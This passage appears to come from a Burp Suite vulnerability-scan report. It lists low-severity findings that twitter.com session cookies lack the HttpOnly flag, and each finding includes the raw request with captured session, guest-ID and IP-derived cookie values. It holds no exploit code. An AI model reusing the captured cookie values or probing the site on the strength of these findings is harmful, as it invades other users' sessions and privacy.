The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KhloeKardashian HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.33. http://twitter.com/KimKardashian previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/KimKardashian

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7DDoOcmV0dXJuX3RvIiVodHRwOi8vdHdpdHRlci5jb20vS2ltS2FyZGFz%250AaGlhbjoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--dd57a4fe4c4e017cb678d4f77a9a59706b7869bb; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KimKardashian HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.34. http://twitter.com/Late_Show previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Late_Show

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Late_Show HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.35. http://twitter.com/LibertyHotel previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/LibertyHotel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LibertyHotel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.36. http://twitter.com/Michael_Joseph previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Michael_Joseph

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Michael_Joseph HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.37. http://twitter.com/Michael_Joseph/status/30390775099424770 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Michael_Joseph/status/30390775099424770

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwMzkwNzc1MDk5NDI0NzcwOgxjc3JmX2lkIiViNWFh%250AMzYyYjVlN2NkY2M5MjE1YzdhZjdkNjRhMzgwMjoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--f1b68fb54f1b85d8151c7dd784fd1db4f27f519c; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Michael_Joseph/status/30390775099424770 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.38. http://twitter.com/Michael_Joseph/status/30750905452204032 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Michael_Joseph/status/30750905452204032

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzUwOTA1NDUyMjA0MDMyOgxjc3JmX2lkIiU2NGIz%250AM2Q5ODM3OTJkMzdhM2NmN2MyMTM0MTQwMWI1YjoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--541977a9c3c5e1a5a3320c2e55e9133173473f96; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.39. http://twitter.com/Michael_Joseph/status/30790097846673409 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Michael_Joseph/status/30790097846673409

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzkwMDk3ODQ2NjczNDA5Ogxjc3JmX2lkIiU0ZTYz%250AMTFjMGI1MGExOTQ1ZDU1ZTJiMzY3YmViYjhmZDoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--3f3d222c37991f7c56cd273e7db3127271465e45; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Michael_Joseph/status/30790097846673409 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.40. http://twitter.com/MittRomney previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/MittRomney

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a144f2d48721ec13cc6db17b0167bf7e0dce4447; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MittRomney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.41. http://twitter.com/NewYorkPost previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/NewYorkPost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NewYorkPost HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.42. http://twitter.com/Nicole_114 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Nicole_114

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Nicole_114 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.43. http://twitter.com/Oprah previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Oprah

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Oprah HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.44. http://twitter.com/PageLines previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/PageLines

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PageLines HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.45. http://twitter.com/PageLines/status/27898822361354240 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/PageLines/status/27898822361354240

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vUGFnZUxpbmVz%250AL3N0YXR1cy8yNzg5ODgyMjM2MTM1NDI0MDoMY3NyZl9pZCIlMzc4NTRjMzAw%250AODE3YjBiNmI1MTM5ZjdiNDE2M2E1ZmU6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--8f776230b304f1b0fa1fdaa92cad95b801a77055; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PageLines/status/27898822361354240 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.46. http://twitter.com/PhantomGourmet previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/PhantomGourmet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PhantomGourmet HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.47. http://twitter.com/Prucenter previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Prucenter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

